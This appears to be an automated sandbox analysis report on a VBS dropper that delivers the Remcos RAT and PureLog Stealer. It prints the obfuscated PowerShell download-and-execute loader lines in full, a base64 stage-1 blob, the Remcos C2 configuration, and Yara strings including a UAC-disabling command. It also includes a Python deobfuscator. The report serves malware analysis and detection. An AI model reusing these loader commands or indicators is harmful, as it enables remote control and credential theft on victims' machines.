
Windows Analysis Report
5fKvwnCAeC.vbs

Overview

General Information

Sample name: 5fKvwnCAeC.vbs (renamed because the original name is a hash value)
Original sample name: f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
Analysis ID: 1523832
MD5: 0c6c4542c1abc5fc3d5eab3e4ab3793a
SHA1: 288dfb240061530c2c73ae4183b7330623e94a69
SHA256: f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
Tags: BlindEagle, vbs, user-JAMESWT_MHT

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7808 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 7048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
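The process tree above shows the whole loader chain: wscript.exe runs the VBS, which starts powershell.exe (PID 8120) with a base64 `$Codigo` string; that stage spawns a second, hidden powershell.exe (PID 7484) whose command line spells `iex` as `$ShellId[1]+$ShellId[13]+'X'`, hides `$` and the quote character behind the placeholder tokens `FIi` and `9uO`, and passes the payload URL reversed; the RunPE assembly it loads from archive.org then hands the Remcos payload to RegAsm.exe (PID 7048), where the Yara rules match. The Python script below is an added example, not part of the report: it statically recovers the PID 7484 script and its indicators from the command line copied above. It assumes the standard value of the Windows PowerShell automatic variable `$ShellId` ("Microsoft.PowerShell"); the stage-1 helper is exercised on a constructed base64 string rather than the full blob.

```python
"""Static deobfuscation of the two-stage PowerShell loader in the process tree
(wscript.exe -> powershell.exe -> powershell.exe -> RegAsm.exe). Added example.

Stage 1 is a plain base64 string ($Codigo). Stage 2 rebuilds the real script
from 'a'+'b'+... fragments, then .replace()s the placeholder tokens 'FIi' and
'9uO' with '$' and the quote character, and passes the RunPE URL reversed.
"""
import base64
import re

# Value of the automatic variable $ShellId in Windows PowerShell: the loader
# spells the cmdlet as $ShellId[1] + $ShellId[13] + 'X'  ->  'ieX' (iex).
SHELL_ID = "Microsoft.PowerShell"

# The -command argument of PID 7484, copied from the report; split into adjacent
# Python literals only so that it fits on the page.
STAGE2 = (
    ".( $sHELlId[1]+$shEllID[13]+'X') "
    "(('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'"
    "+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'"
    "+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'"
    "+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'"
    "+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'"
    "+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'"
    "+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'"
    "+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'"
    "+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'"
    "+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'"
    "+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'"
    "+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))')"
    ".rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36)"
    ".rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
)


def stage1_decode(cmdline: str) -> str:
    """Stage 1: pull the base64 out of "$Codigo = '...'" and decode it as UTF-8."""
    b64 = re.search(r"\$Codigo\s*=\s*'([A-Za-z0-9+/=]+)'", cmdline, re.I).group(1)
    return base64.b64decode(b64).decode("utf-8")


def resolve_cmdlet(expr: str) -> str:
    """Rebuild the cmdlet hidden in the leading '.( $ShellId[i]+$ShellId[j]+'X' )'."""
    parts = re.match(r"\.\(\s*([^)]*)\)", expr).group(1).split("+")
    out = []
    for piece in (p.strip() for p in parts):
        idx = re.fullmatch(r"\$shellid\[(\d+)\]", piece, re.I)
        out.append(SHELL_ID[int(idx.group(1))] if idx else piece.strip("'"))
    return "".join(out)


def ps_chars(expr: str) -> str:
    """Decode a PowerShell [char]N+[char]M+... expression into a string."""
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.I))


def deobfuscate_stage2(expr: str) -> str:
    """Join the quoted fragments, then apply each .replace(([char]..),[string][char]N)."""
    repl_re = re.compile(r"\.replace\(\(([^)]*)\),\[string\]\[char\](\d+)\)", re.I)
    replacements = [(ps_chars(old), chr(int(new))) for old, new in repl_re.findall(expr)]
    body = re.sub(r"^\.\([^)]*\)\s*", "", expr)   # drop the iex invocation
    body = repl_re.sub("", body)                  # drop the replace chain
    script = "".join(re.findall(r"'([^']*)'", body))
    for old, new in replacements:                 # same order PowerShell applies them
        script = script.replace(old, new)
    return script


def extract_iocs(script: str) -> dict:
    """Pull the download URL, the reflective-load target and the RunPE arguments
    out of the recovered script; the first Invoke() argument is a reversed URL."""
    args_src = re.search(r"Invoke\(\$null,\s*\[object\[\]\]@\((.*)\)\)", script).group(1)
    args = [a.strip().strip("'") for a in args_src.split(",")]
    return {
        "stage_url": re.search(r"https?://[^'\s]+", script).group(0),
        "type": re.search(r"GetType\('([^']+)'\)", script).group(1),
        "method": re.search(r"GetMethod\('([^']+)'\)", script).group(1),
        "payload_url": args[0][::-1],
        "inject_target": args[4],
        "args": args,
    }


if __name__ == "__main__":
    recovered = deobfuscate_stage2(STAGE2)
    print("cmdlet:", resolve_cmdlet(STAGE2))
    print("script:", recovered)
    for key, value in extract_iocs(recovered).items():
        print(f"{key:>14}: {value}")
```

The recovered payload URL is the `http://45.90.89.123/2117/RMCCF.txt` that appears in the Virustotal results further down, and the fifth RunPE argument names RegAsm as the host process, matching the RegAsm.exe child in the tree. Nothing in the example downloads or runs either stage; it only rewrites the command line.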
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted Remcos configuration:
{"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches in process memory dumps (Source | Rule | Description | Author):
  0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    • 0x6c4b8:$a1: Remcos restarted by watchdog!
    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
  (19 entries in total; the remaining ones are not included in this export)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
  11.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  11.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  11.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  11.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    • 0x6c4b8:$a1: Remcos restarted by watchdog!
    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
  11.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6657c:$str_b2: Executing file:
    • 0x675fc:$str_b3: GetDirectListeningPort
    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x67128:$str_b7: \update.vbs
    • 0x665a4:$str_b9: Downloaded file:
    • 0x66590:$str_b10: Downloading file:
    • 0x66634:$str_b12: Failed to upload file:
    • 0x675c4:$str_b13: StartForward
    • 0x675e4:$str_b14: StopForward
    • 0x67080:$str_b15: fso.DeleteFile "
    • 0x67014:$str_b16: On Error Resume Next
    • 0x670b0:$str_b17: fso.DeleteFolder "
    • 0x66624:$str_b18: Uploaded file:
    • 0x665e4:$str_b19: Unable to delete:
    • 0x67048:$str_b20: while fso.FileExists("
    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
  (11 entries in total; the remaining ones are not included in this export)

Yara matches in AMSI buffers (Source | Rule | Description | Author):
  amsi64_7484.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= 
F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQyc
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = 
FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQyc
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
